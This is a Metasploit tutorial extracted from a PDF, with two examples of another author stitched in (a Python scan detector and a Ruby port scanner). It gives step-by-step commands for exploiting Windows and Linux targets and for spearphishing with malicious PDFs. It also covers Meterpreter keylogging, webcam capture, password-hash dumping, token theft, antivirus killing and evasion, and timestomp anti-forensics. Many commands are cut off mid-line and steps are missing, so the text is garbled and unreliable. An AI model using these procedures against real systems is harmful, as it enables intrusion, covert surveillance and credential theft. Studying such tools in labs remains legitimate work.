8/20/2019 Met as Ploit Guide
1/92
Metasploit Guide
Table of Contents
1. Introduction about Metasploit
2. Metasploit Basics
3. Information Gathering
4. Exploitation
5. Introduction about Meterpreter
6. Post Exploitation using Meterpreter
7. Metasploit Utilities
8. Meterpreter Scripting
9. Client Side Exploitation
10. Social Engineering Toolkit (SET)
11. Auxiliary modules
12. Linux exploitation
Attribution
1. http://www.offensive-security.com/metasploit-unleashed/Main_Page
2. http://www.securitytube.net
3. http://www.metasploit.com
4. http://en.wikipedia.org
5. Various blogs and ethical hacking websites
Note: This document was solely made for educational purposes. Please do not use these methods for any kind of malicious activities or purposes (intentional or unintentional).
Chapter One
Introduction about Metasploit
Metasploit is an open source computer security project. Metasploit is not a single tool; it is a framework which is used for developing and executing exploit code against a remote target. Using Metasploit we can exploit most of the vulnerabilities that exist in software.
Metasploit Architecture
Libraries
1. Rex: It is the basic library for performing most tasks. It handles sockets and different types of protocols.
2. MSF Core: It provides the basic API and defines the Metasploit framework.
3. MSF Base: It provides the friendly API, i.e. simplified APIs for use in the framework.
Modules:
Payload: A payload is a piece of code that runs in the target system remotely.
Exploit: An exploit is a piece of software, chunk of data or a sequence of code that takes advantage of a bug or vulnerability.
Auxiliary modules: These modules are used for scanning, fuzzing and doing various other tasks.
Encoder: A program which encodes our payloads to avoid antivirus detection.
Interfaces:
Metasploit has different interfaces to ease our tasks. We can do a variety of tasks with these interfaces.
1. MSFConsole: This is the main interface we use throughout this document. Open a terminal and type msfconsole. You will get a window like the below screenshot.
Msfconsole eases all our tasks compared to the other interfaces. I will explain all the commands which we can use in the msfconsole interface in the Metasploit Basics chapter.
2. MSFCLI
This is the sample usage of the msfcli interface. msfcli gives more importance to scripting and interpretability. It runs directly from the command line. It is a fantastic tool when you know the exact exploit and payload.
Usage:
Open a terminal.
1. msfcli -h
2. msfcli windows/smb/ms08_067_netapi O
It displays the various options.
3. msfcli windows/smb/ms08_067_netapi R
3. Armitage
Armitage is the graphical GUI version of Metasploit. It was developed by Raphael Mudge. In Armitage we can open more than one terminal and search our exploits in either the GUI or the CUI at the same time.
Usage:
Open a terminal and type armitage.
It will display the above window. We can search our exploits using the attacks tab and search for the appropriate payloads for that exploit.
The Armitage window below displays the Metasploit CUI version and the one above the GUI version.
You can view video tutorials about Armitage at the link below.
http://www.fastandeasyhacking.com/manual
4. MSFGUI:
It is better to use the msfconsole rather than the other interfaces because it gives more power to our pentesting tasks.
Metasploit Editions:
Metasploit provides a community edition free of cost to everyone; the remaining two editions cost more. Giant security consulting firms are using the Express and Pro editions because those editions are too costly.
Chapter Two
Metasploit Basics
To become familiar with the Metasploit framework one should know the basic commands of Metasploit. Metasploit commands are classified into 2 types:
1. Core commands
2. Database commands
To open Metasploit, open a terminal and type msfconsole.
1. Core commands
To view these commands type ? or type help in the Metasploit console. Now I will explain the important commands that will help in the exploitation.
Useful commands
1) back: To come back from the current exploit or module.
You can see I am getting back from the exploit (ms10_002_aurora) to the msf main window.
2) banner: This command displays the Metasploit banner.
3) connect: This command is used to connect to a host. We should specify the host IP address and port number along with this command.
4) exit and quit: These commands are used to exit from Metasploit and return to the root shell.
5) irb: This command is used to drop into irb mode. Using this mode one can write one's own Ruby scripts.
6) info: This command displays the whole information about the selected exploit.
7) load: This command is used to load plugins into Metasploit.
8) unload: This command is used to unload a loaded plugin from the framework.
9) search: This command is used to search for a specific exploit or module. This command is very useful to search for any module.
10) resource: This command is used to run specific commands from a specified file. We should give the file path along with this command.
11) use: This command is used to select a specific exploit.
12) version: This command will display the current version of Metasploit.
To update Metasploit type msfupdate in the console.
13) set and unset: These commands set variables. By using these commands we can set our payloads and we can set the IP address. Using unset we can unset the value and then give a new IP address.
14) setg and unsetg: These commands are used to set our variables globally throughout our pentesting.
15) show: This command is used to view the options or modules. It is a very useful command.
Database commands: Database commands are very useful to maintain huge amounts of data and export that data into files. We can share data among our pentesting team and collaborate on that data.
By default, Metasploit comes with the PostgreSQL database.
1) db_connect: This command is used to connect to the database. The format of this command is db_connect username:password@hostname:port/database name. In my system my username and password are:
db_connect msf3:4bfedfc2@localhost:7337/msf3dev
2) db_disconnect: To disconnect from the database.
5) db_import: To import files from various software like Nessus and Nexpose.
6) db_export: To export our results to other software.
7) hosts: This command will display the connected hosts.
You can use hosts -c to filter the columns.
8) db_nmap: Nmap is a very useful tool for pentesters and network engineers. We can do many tasks using the nmap tool.
eg: db_nmap -O 192.168.217.131. It displays the services and operating system info.
9) services: This command will display the list of all services running.
10) vulns: It will display the vulnerabilities existing in the victim system.
Chapter Three
Information gathering
"If I had eight hours to chop down a tree, I'd spend six hours sharpening my axe."
- Abraham Lincoln
Information gathering is the first step in penetration testing. In this phase we gather as much information as possible about the target. The more information we have, the greater the chance of exploiting it. In this phase we gather information like IP addresses and services; if the target is a website then we should also gather subdomains, emails, the hosting server and the location of the server.
There are 2 types of information gathering:
1) Active information gathering
2) Passive information gathering
Passive information gathering: In this technique we are not directly interacting with the target. We will search for information using the whois and nslookup commands. There are many tools available in BackTrack to find DNS information.
Nslookup: Using nslookup we will get additional server information.
Whois: This command is used to gather subdomain information and the registrar name.
These are only a few of the techniques. There are many more ways to gather information passively.
Active information gathering:
In active information gathering we will use the tool nmap (network mapper), written by Gordon "Fyodor" Lyon. It is a cross-platform tool.
I will explain some basic nmap commands to scan our network. The book "Nmap Cookbook: The Fat-Free Guide to Network Scanning" is highly recommended to explore much more about Nmap.
To scan a single IP address: We can use Nmap to scan a single IP address.
Usage: nmap ip address
To scan multiple IP addresses:
Usage: nmap 192.168.217.131 192.168.217.133
To scan an entire subnet:
Usage: nmap 192.168.217.131/24
Advanced scanning options:
Nmap has many advanced features to successfully gather more information about the target. We can scan TCP ports and UDP ports, find the operating system and do version detection.
We can perform a null scan, an ACK scan and a traceroute on the target. Nmap is like a Swiss army knife; we can handle a wide variety of security testing and network administration tasks with it.
TCP SYN scan:
We can perform a SYN scan on the network. This scan is very stealthy. It does not open a full connection to the remote host.
Usage: nmap -sS 192.168.217.131
UDP (User Datagram Protocol) scan: We can scan the UDP ports of the target system.
Usage: nmap -sU 192.168.217.131
TCP Null scan:
Now we are performing a null scan to trick the firewalled system and get a response from that system.
Usage: nmap -sN 192.168.217.131
Operating system and version detection:
To find the operating system of the target we will use the -O option.
Usage: nmap -O 192.168.217.131
Version detection:
Using Nmap we can find the versions of the services running on the ports. We will use the -sV option to do this.
Usage: nmap -sV 192.168.217.131
You can combine both the -O and -sV options at the same time.
Usage: nmap -O -sV 192.168.217.131
These are some nmap commands to find the target's services, open ports and operating system info. There are many other advanced options in nmap. I highly recommend the book Nmap Cookbook to know more about nmap and explore the many options that exist in nmap.
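As an added example (not part of the original guide), here is the defender's view of the SYN and NULL scans described above: a small Python classifier that flags a source as SYN-scanning when it sends bare SYNs to many ports without ever completing a handshake, and as NULL-scanning when it sends segments with no flags at all. The packet records and the threshold of five ports are constructed for the example; the code generalises to any number of sources and targets.

```python
from collections import defaultdict

# Constructed packet summaries for the example: (src_ip, dst_ip, dst_port, flags).
# 'flags' is the set of TCP flag names set on the segment. Not a real capture.
SAMPLE_PACKETS = [
    # 10.0.0.5 behaves like nmap -sS: a bare SYN to many ports and never an ACK,
    # so no handshake is ever completed (the "half-open" pattern).
    ("10.0.0.5", "192.168.217.131", 21, frozenset({"SYN"})),
    ("10.0.0.5", "192.168.217.131", 22, frozenset({"SYN"})),
    ("10.0.0.5", "192.168.217.131", 23, frozenset({"SYN"})),
    ("10.0.0.5", "192.168.217.131", 25, frozenset({"SYN"})),
    ("10.0.0.5", "192.168.217.131", 80, frozenset({"SYN"})),
    ("10.0.0.5", "192.168.217.131", 445, frozenset({"SYN"})),
    # 10.0.0.9 is an ordinary client: SYN, then ACK completing the handshake.
    ("10.0.0.9", "192.168.217.131", 80, frozenset({"SYN"})),
    ("10.0.0.9", "192.168.217.131", 80, frozenset({"ACK"})),
    ("10.0.0.9", "192.168.217.131", 80, frozenset({"ACK", "PSH"})),
    # 10.0.0.7 behaves like nmap -sN: segments with no TCP flags at all.
    ("10.0.0.7", "192.168.217.131", 135, frozenset()),
    ("10.0.0.7", "192.168.217.131", 139, frozenset()),
    ("10.0.0.7", "192.168.217.131", 445, frozenset()),
    ("10.0.0.7", "192.168.217.131", 3389, frozenset()),
    ("10.0.0.7", "192.168.217.131", 5900, frozenset()),
]


def classify_scans(packets, min_ports=5):
    """Return {(src, dst): [labels]} for sources that look like SYN or NULL scanners.

    A (src, dst) pair is labelled "syn_scan" when at least min_ports distinct ports
    received a bare SYN that the source never followed with an ACK, and "null_scan"
    when at least min_ports distinct ports received a segment with no flags set.
    """
    syn_only = defaultdict(set)    # (src, dst) -> ports that saw a bare SYN
    completed = defaultdict(set)   # (src, dst) -> ports the source later ACKed
    null_ports = defaultdict(set)  # (src, dst) -> ports that got a flagless segment
    for src, dst, port, flags in packets:
        key = (src, dst)
        if flags == {"SYN"}:
            syn_only[key].add(port)
        elif "ACK" in flags and port in syn_only.get(key, ()):
            completed[key].add(port)
        elif not flags:
            null_ports[key].add(port)

    findings = {}
    for key in sorted(set(syn_only) | set(null_ports)):
        labels = []
        # Half-open handshakes: SYN sent, but the source never finished the handshake.
        if len(syn_only[key] - completed[key]) >= min_ports:
            labels.append("syn_scan")
        if len(null_ports[key]) >= min_ports:
            labels.append("null_scan")
        if labels:
            findings[key] = labels
    return findings


if __name__ == "__main__":
    for (src, dst), labels in classify_scans(SAMPLE_PACKETS).items():
        print(f"{src} -> {dst}: {', '.join(labels)}")
```

Running it reports 10.0.0.5 as a SYN scanner and 10.0.0.7 as a NULL scanner, while the ordinary client 10.0.0.9 is not flagged.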
Chapter Four
Exploitation
Exploitation is the meridian for every security engineer. It is a great feeling to exploit a first machine and get full control over that machine. Exploitation is a very difficult task to accomplish; we need to know much about the target. In this chapter I will show you advanced techniques to get a shell on the target system and you will gain full control over the victim system.
Before reading this chapter please read chapter two to know the basics of Metasploit. I am going to use the msfconsole throughout this chapter.
Basic exploitation:
I am going to use the ms08_067_netapi exploit. You can get much more information about this exploit at the link below.
http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi
Metasploit has a great feature: tab completion. If we don't know about a particular exploit, press tab twice to get some suggestions displayed.
You can see it displays various exploits. Or you can search for a particular exploit using the search command.
Search netapi:
Usage: search exploit name
show: The show command is used to view the various exploits, payloads and encoders.
Usage: show exploits, show payloads, show encoders.
Steps to exploit our first Windows machine:
Step 1: use exploit/windows/smb/ms08_067_netapi
Step 2: show options to view the various options.
Step 3: set R
Setting a Payload:
Usage: set payload windows/shell/bind_tcp
Step 5: To get the shell on the target computer, use the command exploit. This command runs the payload against the target system. Then you will get a remote shell on the target system.
Usage: exploit
For confirmation, you can check the IP address of the remote system just by typing ipconfig.
Congratulations! You have exploited your first Windows machine. Now you can create your own folders and run files remotely on the target system. To give more power to the exploitation we will use the meterpreter payload. I will discuss this payload later.
Commands used in this chapter:
1) use exploit/windows/smb/ms08_067_netapi: To select a particular exploit
2) show options: To view the options
3) set R
Chapter Five
Introduction about Meterpreter
Meterpreter is the forerunner product in the Metasploit framework which is leveraged as a payload after exploitation. Meterpreter is used to enhance post exploitation.
Features:
It does not create a new process and completely resides in memory, so there is no chance of detection. It does not write any data on the disk. All the communication from the attacker to the victim is completely encrypted; it creates a separate channel to encrypt the data.
Meterpreter has a huge number of options to ease our post exploitation. We can gain full control over the victim system.
Exploitation using meterpreter:
In this we follow the same procedure as the above exploitation, except for the payload.
Step 3: Setting meterpreter as the payload.
Usage: set payload windows/meterpreter/bind_tcp
Step 4: Run the exploit command.
Chapter Six
Post Exploitation using Meterpreter
We can significantly improve post exploitation using meterpreter. Many of us think getting a shell on the target system is the important task, but controlling our target system is very important too. We can control our target extensively by using meterpreter. Meterpreter is the extension to the Metasploit framework that allows us to leverage Metasploit's functionality and further compromise our target.
We can do many amazing tasks using the meterpreter payload, like taking webcam snapshots, dumping hashes, monitoring keystrokes, downloading files from the target, uploading files to the target and many more. You can see all those tasks in this chapter.
First, we have to compromise our target using meterpreter, then we will get a meterpreter shell. Follow the procedure in the above chapter, Introduction about Meterpreter, to exploit the target. Meterpreter has a very large command list; I will try to cover 95% of the commands in this chapter. Practice all the commands which I discuss in this chapter to become comfortable with Meterpreter.
Meterpreter commands are divided into many sections depending upon their usage. I will discuss all the commands, not in the same order but in a random order, depending upon the task.
1. Core commands
2. Stdapi: System commands
3. Stdapi: File system commands
4. Stdapi: User interface commands
5. Stdapi: Networking commands
6. Priv commands
Some of these commands are self explanatory; you can easily understand them by reading the description. I will leave those commands as an exercise to you. I highly recommend you to read the book "Introduction to the Command Line (Second Edition): The Fat Free Guide to Unix and Linux Commands" to become familiar with the Linux operating system. This book gives you a good knowledge of Linux commands and how to use them efficiently.
1) Core commands:
2) System commands:
3) File system commands:
4) User interface and webcam commands:
5) Networking commands:
6) Priv commands:
1) Core commands: Core commands are the basic meterpreter commands.
1) background: This command is used to background a meterpreter session; we then come back to the exploit module.
To view the available sessions: sessions -l
To interact with a session we have to use sessions -i session id, eg: sessions -i 1
2) bgrun: This command is used to execute a meterpreter script as a background process.
3) info: It gives the description of the selected post exploitation module.
Usage: info module name
4) migrate: It migrates to another process. We have to migrate to another process because the victim might close the process which meterpreter is bound to. So we have to migrate to a system process.
Usage: migrate process id
eg: migrate 12212
5) use: This command is used to load a particular extension into the framework. It is like the load command in Metasploit.
Usage: use espia
6) run: This command is used to run a meterpreter script.
Usage: run script name
eg: run checkvm
7) irb: This command is used to drop into a Ruby shell where we can create Ruby based scripts.
8) Channel commands: Channels are very useful to execute our commands on the target system. The communication in the channels is encrypted. We can read, write and interact with the channels.
To create a channel we have to use the execute command.
Usage: execute -f explorer.exe -c
channel -l: To view the list of channels.
channel -w: To write data into a particular channel we will use this command.
Usage: channel -w 2 (2 is the channel number)
channel -r: To read data from a particular channel.
Usage: channel -r 2
interact: This command is used to interact with a particular channel.
Usage: interact 2
File system commands:
1) pwd: It displays the present working directory, and the cd command is used to change the directory.
2) ls: To list the files in a directory.
3) cat: This command is used to read the contents of a file. In ls you can find two files, namely credit card and email password. I intentionally created them to demonstrate how awful it is to save confidential information without encrypting it.
So do not save your confidential information in text files and do not write passwords anywhere. If you want to write them down, then encrypt those files. TrueCrypt is a good software to encrypt any kind of file.
4) download: You can also download those files using this command.
Usage: download file path
eg: download c:\\creditcard.txt
5) upload: You can upload your backdoors into the target system.
Usage: upload source destination
eg: upload /root/payload.exe c:\\
search: This command is used to search for files in a folder or drive. We can also specify the type of file to search for, eg. doc, txt, pdf.
Usage: search -d c:\\ -f *.txt -r
mkdir, rmdir: To make a directory we use the mkdir command. To remove a directory we use the rmdir command.
Usage: mkdir kaleem
Usage: rmdir kaleem
Networking commands:
1) arp: To display the host ARP cache and host information.
2) ipconfig: It is used to display the remote host's IP address.
netstat: It is used to display the network statistics.
route: It is used to display the routing table information. This command is very useful for the pivoting concept.
Usage: route -h
System commands:
sysinfo: This command is used to view the target system information.
ps: This command is used to display the processes running on the target system.
getpid: This command is used to view the current process.
getuid: This command is used to view the current user.
reboot: This command is used to reboot our target system.
shutdown: This command is used to shut down the remote system.
shell: This command is used to drop a shell on the remote system.
Token impersonation:
Token impersonation is a very important concept in meterpreter. Windows tokens are just like web cookies. They are like temporary keys which hold an object's security information for the entire login, so that users do not have to provide their credentials each time they access a file or an object. There are two types of tokens available:
1) Delegation token
2) Impersonate token
1) Delegation token: Delegation tokens are used for interactive logins such as logging into your Windows machine and connecting to a remote desktop.
2) Impersonate token: Impersonate tokens are used for non-interactive logins like connecting to a network drive.
Tokens remain available to us until reboot. When the user logs off from the system, the delegation token becomes an impersonate token, but it has all the rights just like the delegation token.
We will use the incognito extension to steal and impersonate Windows tokens. You can find out much more about tokens in the PDF at the link below.
http://labs.mwrinfosecurity.com/assets/142/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf
First we have to load the incognito extension into our meterpreter.
Usage: use incognito
To view the available tokens you can use the below command.
Usage: list_tokens -u
You can see 4 delegation tokens and 1 impersonate token are available. Quickly check who we are using the getuid command.
Usage: getuid
Now I am logged in as NT AUT
Impersonate:
You can see in the delegation tokens the KALEEM27A12BDC\ADMINISTRATOR token is available. Now I am going to impersonate that user.
Usage: impersonate_token token name, eg: impersonate_token KALEEM27A12BDC\\ADMINISTRATOR
You can see I am impersonating KALEEM. You can see the user id using the getuid command.
Steal token:
You can steal a token from other users.
Usage: steal_token process id
eg: steal_token 1234
Drop token:
You can drop the token to get back. You can see in the below picture, first I impersonated kaleem and then I used the drop_token command to get back to NT AUT
rev2self:
This command is also used to get back to the old user.
Usage: rev2self
getprivs: This command is used to get all the available privileges on the victim machine.
User interface and webcam commands:
idletime: This is used to view how long our victim has been away from the system, meaning he has not interacted with the keyboard or mouse.
Keylogging:
All of us are very curious about what the victim is typing on his system and how to record all those keystrokes. The Metasploit developers have done a great job writing an inbuilt keylogger. We can monitor all the keystrokes typed by our victim.
There are 3 commands available in meterpreter.
keyscan_start: To start the keylogger on the victim machine.
keyscan_dump: To dump all the keystrokes typed by our victim.
keyscan_stop: To stop the keylogger on the victim's system.
I performed all these commands on my victim machine (Windows XP). You can view them in the below picture.
It can even record alt, ctrl, shift, all keys. It is a very powerful command.
uictl: This command is used to control the victim's keyboard and mouse. We can disable their keyboard or mouse remotely.
Usage: uictl enable/disable keyboard/mouse
Screenshot:
We can grab screenshots of our victim's machine. We can view what the victim is viewing. You can see my Windows machine desktop here.
Usage: screenshot
Webcam commands:
Another interesting set of commands are the webcam commands. You can view the victim remotely. I do not have a webcam in my laptop (I am using a pretty old one). You can try this command on your system.
There are two commands available.
1) webcam_list: To view the list of webcams.
Usage: webcam_list
2) webcam_snap: To take a snapshot of our victim.
Usage: webcam_snap
I got an error because I do not have a webcam on my laptop. It will work if you have one on yours.
Priv commands:
These commands are used to escalate privileges and to get all the available privileges on the victim machine.
getsystem: This command is used to get privileges on the victim system.
Usage: getsystem
hashdump: This command is used to dump all the hashed passwords from the victim system.
You can crack the hashed passwords using the psexec exploit or jtr_crack_fast.
timestomp (anti forensic tool):
When we are conducting a pentest on the victim's system, we may access their filesystem. If there is any forensic investigation, they will easily detect that the system has been compromised. The best way to avoid forensic detection is not to access our victim's file system. So we will use meterpreter: it completely resides in memory and does not write any data to the disk.
Set the modification time of a file:
We can set the modification time of a file. To do this use the -m option.
Usage: timestomp path of the file -m MM/DD/YYYY
To display MAC attributes:
Use the -v option to display all attributes.
Usage: timestomp path of the file -v
Eg: timestomp c:\\creditcard.txt -v
To set existing file attributes:
We can copy an already existing file's attributes onto our specified file. To do this use the -f option. In the below example I applied the ntldr file attributes to my file.
Usage: timestomp path of your file -f path of existing file
Eg: timestomp c:\\creditcard.txt -f c:\\ntldr
Chapter Seven
Metasploit Utilities
Metasploit comes with two utilities to generate shellcode and to evade antivirus detection. Using these utilities we can do the exploitation stealthily.
There are two types of utilities:
1. Msfpayload
2. Msfencode
1. Msfpayload:
Using msfpayload we can generate shellcode executables, and we can use that shellcode outside the framework. We can generate the payload in the format we need. We can create C, Ruby, JavaScript and exe, among many types of formats.
Step 1:
Usage: msfpayload -h
Step 2: To view the various options to fill.
Usage: msfpayload windows/meterpreter/reverse_tcp O
Step 3:
msfpayload windows/meterpreter/reverse_tcp L
Msfencode:
The payload which we have generated using msfpayload is fully functional, and if the victim scans it with the help of an antivirus it could be detected. Antivirus software looks for signatures when scanning, so the shellcode is detected by the antivirus.
To evade this, the Metasploit developers have done a great job introducing a new utility called msfencode. Using this we can encode our shellcode with various encoders to bypass antivirus detection.
Usage: msfencode -h
There are different kinds of options available to use.
Important options:
-c means count, i.e. how many times we are encoding.
eg: -c 5 means I am encoding 5 times.
-e Name of the encoder we use.
eg: -e x86/alpha_upper
-o Give the output file name.
eg: -o payload.exe
-t Type of format.
eg: -t raw
-x Option to give an alternative template.
Eg: -x notepad.exe
-k The given template opens and our payload runs in a new process.
Eg: -x notepad.exe -k
The victim is shown notepad when he opens the file, but the payload runs stealthily in the background.
List of msfencoders:
Usage: msfencode -l
These are a list of the available encoders. We can encode our payload using any of the above encoders to evade antivirus detection.
A very good encoder is shikata_ga_nai; it is a polymorphic encoder.
Step 3: Encoding with msfencode
Usage: msfpayload windows/meterpreter/reverse_tcp L
Multi encoding with msfencode
Step 4:
Usage: msfpayload windows/meterpreter/reverse_tcp L
Encoding with custom executable templates
Step 5: msfpayload windows/meterpreter/reverse_tcp L
Chapter Eight
Meterpreter scripting
Meterpreter has many inbuilt scripts to complete our difficult tasks using just a simple script. We can create our own scripts using the Ruby language and run those scripts after exploitation.
You can see sample scripts in the above picture. There are more than 200 scripts available in Metasploit for our post exploitation. Now I will discuss some important scripts.
1. checkvm
2. credcollect
3. keylogrecorder
4. vnc
5. webcam
6. getcountermeasure
7. killav
8. scraper
9. enum_firefox
10. file_collector
11. arp_scanner
12. gettelnet
13. hostsedit
To execute a particular script you should use the run command along with that script name.
Usage: run checkvm
1) checkvm: This script is used to check whether the target is running on a virtual machine or not.
2) credcollect: This script is used to collect the hacked passwords.
Usage: run credcollect
3) keylogrecorder: This script will record all keystrokes which have been typed on the victim system.
4) vnc: This is a very useful script. It gives a remote desktop connection to the remote system. You can see my Windows system here.
Usage: run vnc
5) webcam: This script automatically switches on the webcam on the remote machine and we can view it remotely.
Usage: run webcam
6) getcountermeasure: This is a wonderful script. It can bypass the antiviruses, firewall and intrusion detection system on the victim machine.
7) killav: This script kills the antivirus on the victim system.
Usage: run killav
8) scraper: This script is very handy. It will download all the system information and all the registry information.
Usage: run scraper
9) enum_firefox: This script will gather the stored passwords and cookies in the Firefox browser on the victim's system.
Usage: run enum_firefox
10) file_collector: This script is used to gather existing files on the target system. We can gather doc, pdf and text files using this script.
I used many options to search for files; you can see the various options using the -h option.
-d To search a particular directory
-f To search for a particular file type.
11) gettelnet: This script enables a telnet session on the remote PC.
Usage: run gettelnet
12) arp_scanner: This script is used for pivoting and port forwarding, and we can enumerate local interfaces using this script.
Usage: run arp_scanner
13) hostsedit: This script is used to edit the hosts file on the remote system.
Chapter Nine
Client Side Exploitation
Client side attacks were the next evolution of attacks after network defenses became much more robust. These attacks target the software which is installed on the victim's computer, like browsers, PDF readers and MS Word. This software is commonly installed on every computer, whether it is an office computer or your personal computer.
These attacks have been bestselling because of the lack of awareness among people. In client side attacks, the attacker can send exploits using social engineering techniques. The systems which open the file or malicious link sent by the attacker will be compromised.
Countermeasures:
1. Update your antivirus and antispyware software.
2. Update your operating system and web browsers on a regular basis.
3. Update your PDF reader (eg Adobe, Foxit), flash players (QuickTime, Flash) and word document readers (MS Word).
4. Do not visit atrocious websites.
5. Download software from genuine websites, because some websites offer spyware software.
6. Mozilla and Chrome users can use security addons like WOT (Web Of Trust), NoScript and Better Privacy.
Browser based exploits: In this module our main target is the browser. Now I will demonstrate an infamous exploit, Aurora.
Internet Explorer Aurora memory corruption:
In the year 2010 this exploit came into the picture.
Demo Time
Step 1: use exploit/windows/browser/ms10_002_aurora
Type show options to view the different options. We have to set SRV
Step 3
1) I am setting L
2. When I open that link the Aurora exploit starts working.
3. You can see my Windows system has been compromised.
4. You are greeted with a meterpreter shell.
This exploit has been working flawlessly on Internet Explorer version 6. So it is better to update your browser.
File format exploits
File format exploits are new generation exploits. In this method we will send a file of type pdf, doc or xlb to the target. When the target opens that file their system gets compromised.
Demo Time: Adobe util.printf() buffer overflow vulnerability:
There is a buffer overflow vulnerability in Adobe Reader and Adobe Acrobat Reader version 8.1. By creating a specially crafted PDF we can exploit the target system. You can read more about this vulnerability at the link below.
http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_utilprintf
Step 1: use exploit/windows/fileformat/adobe_utilprintf
I am using the adobe_utilprintf exploit. Type show options to view the different types of options.
Step 2: Change the file name. Usage: set FILENAME book.pdf
Step 3: Set a meterpreter payload, and fill L
Step 5:
Usage: set L
Chapter Ten
Social Engineering Toolkit (SET)
Social engineering is the art of manipulating people into performing actions or divulging confidential information like passwords.
SET was developed by David Kennedy in the Python language with the help of the security community. The main aim of SET is to fill a gap in the penetration testing community and bring awareness about social engineering attacks. No firewall or network intrusion detection system can stop social engineering attacks, because in social engineering the weakest link in the security chain is human stupidity.
The attacks built into this toolkit were designed to attack a person or an organization. This toolkit has different modules. In this tutorial I will perform a spearphishing attack.
Spearphishing Module:
This module allows you to craft email messages and send them to a large number of people or to a single email address. In this attack we will perform file format exploits. We will send an email to a person with an attachment such as an Adobe Reader or zip file. When the victim clicks on the attachment their system will be compromised, and we will get a shell on that system.
Steps: cd /pentest/exploits/set and run ./set
Step 2: Choose the spearphishing attack vector. You can see that various other modules are also available; you can try all of those by yourself. The social engineering toolkit is very easy to use: there is no need to remember commands, and the menu interface is very user friendly.
Step 3: Choose the perform mass email attack option; it will display various file format exploits.
Step 4: We are selecting the Adobe Reader buffer overflow vulnerability. You can see that different payloads have been generated according to our exploit.
Step 5: The payload has been generated. Now choose the first option to keep the same file name, or else you can use your preferred name.
Step 7:
Step 8:
Chapter Eleven
Auxiliary Modules
Auxiliary modules are not exploits. When we hear about Metasploit we always think about how to get a shell on a remote system. But in pentesting we have to do many other tasks, like scanning the remote host, finding open ports, and checking server configuration and misconfiguration.
In the Metasploit framework we have more than 560 auxiliary modules, which include
1) Scanners
2) Fuzzers
3)
Portscanners:
Port scanners are used to see which ports are open on the target system. Now I am using a TCP port scanner to find the open ports on my Windows XP system.
Usage: use auxiliary/scanner/portscan/tcp
Type show options to view the available options
Set the remote IP address: set R
Scanning for netbios:
1. Set remote hosts: set R
Setting rhost: set R
Chapter Twelve
Linux exploitation
So far, you have seen Windows exploitation. Now I will show you how to exploit a Linux operating system. In this chapter we will use Metasploitable 2, which is an intentionally vulnerable Ubuntu Linux based operating system. It was developed by the Metasploit developers so that security professionals can practise their tools on it.
It has the vulnerable web applications Mutillidae and DVWA (Damn Vulnerable Web Application), which contain all the vulnerabilities of the OWASP Top 10 and many more. You can download Metasploitable 2 from the link below.
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
After downloading it from the above link you can install it in your VMware. After the system boots up you can log in to your Metasploitable 2 using username msfadmin and password msfadmin.
First, we have to know the IP address. Just type ifconfig to find the IP address. Then go to your BackTrack machine and use the nmap tool to scan open ports and services, to find out which services are running on the Metasploitable 2 machine.
Scanning with nmap: We have to use nmap to scan for open ports and the services running on them.
Usage: nmap -sT 192.168.217.136 (Metasploitable IP address).
You can see many services running. Now I will choose an exploit for the UnrealIRCD IRC daemon. This version has a backdoor and it is running on port 6667.
Now search for this exploit
Usage: search unrealircd
You can see that only one exploit is available and that its rank is excellent.
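Both the auxiliary/scanner/portscan/tcp module in the previous chapter and the nmap -sT scan above do the same thing underneath: a TCP connect scan, where a full three-way handshake is attempted on each port and a completed connection means the port is open. The Ruby script below is an added example written for this guide, not code from Metasploit or nmap, showing that technique in a few lines. The function names (port_open?, parse_ports, scan_ports) and the default port list are my own choices. Running it against your own hosts is a quick way to confirm that a service you believe you have firewalled really is unreachable.

```ruby
require 'socket'

# Added example: a minimal TCP connect scanner, the same technique that
# Metasploit's auxiliary/scanner/portscan/tcp module and "nmap -sT" use.
# A full TCP handshake is attempted on each port; success means open,
# a refused or timed-out connect means closed or filtered.
# Illustrative code, not the implementation of either tool.

# Returns true when a TCP connection to host:port succeeds within timeout_s.
def port_open?(host, port, timeout_s: 1.0)
  Socket.tcp(host, port, connect_timeout: timeout_s) { true }
rescue SystemCallError, SocketError, IOError
  # ECONNREFUSED (closed), ETIMEDOUT/EHOSTUNREACH (filtered or host down)
  # and SocketError (name resolution) all mean "not open" to a scanner.
  false
end

# Expand a port spec such as "22,80,8000-8002" into a sorted, de-duplicated list.
def parse_ports(spec)
  spec.split(',').flat_map do |part|
    part = part.strip
    if part.include?('-')
      lo, hi = part.split('-', 2).map(&:to_i)
      unless (1..65_535).cover?(lo) && (lo..65_535).cover?(hi)
        raise ArgumentError, "bad port range: #{part}"
      end
      (lo..hi).to_a
    else
      p = Integer(part)
      raise ArgumentError, "bad port: #{part}" unless (1..65_535).cover?(p)
      [p]
    end
  end.uniq.sort
end

# Scan the given ports on host and return the open ones in ascending order.
def scan_ports(host, ports, timeout_s: 1.0)
  ports.sort.select { |p| port_open?(host, p, timeout_s: timeout_s) }
end

# Usage: ruby scan.rb <host> <ports>   e.g. ruby scan.rb 127.0.0.1 21,22,80,139,445,6667
if __FILE__ == $PROGRAM_NAME && !ARGV.empty?
  host = ARGV[0]
  ports = parse_ports(ARGV[1] || '21,22,80,139,445,6667')
  scan_ports(host, ports).each { |p| puts "#{host}:#{p} open" }
end
```

A connect scan is the noisiest kind: every probe completes a handshake, so the target's application logs and any connection-tracking firewall record it, which is exactly why a defender reviewing logs can spot this kind of sweep easily.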
Step 1: use exploit/unix/irc/unreal_ircd_3281_backdoor
Type show options to view the available options
Step 2: set R
Exploit 2:
distcc_exec: distcc is a program that makes it easy to scale large compiler jobs. You can learn more about this exploit at the link below.
http://metasploit.com/modules/exploit/unix/misc/distcc_exec
Step 1: use exploit/unix/misc/distcc_exec
Step 2: Type exploit
Exploit 3:
usermap_script: This is a command execution vulnerability in Samba version 3.0.20. You can read more about it at the link below.
http://www.metasploit.com/modules/exploit/multi/samba/usermap_script
Step 1: use exploit/multi/samba/usermap_script
Step 2: set R
Conclusion:
That's all I have on my mind for this document. I would warmly welcome your feedback (either positive or negative). I need your suggestions, which would help me move further. Thanking you very much for reading this document. Practise all the commands so as to gain confidence and command over Metasploit. Please do not violate any security rules and do not do any malicious activity with these techniques (I hope you really wouldn't). All techniques which I have mentioned here were executed on my laptop. If you have any queries or concerns please feel free to contact me (my contact details are given below). Finally, I would like to conclude with an excellent quote:
There is no security in life, only opportunity. Mark Twain
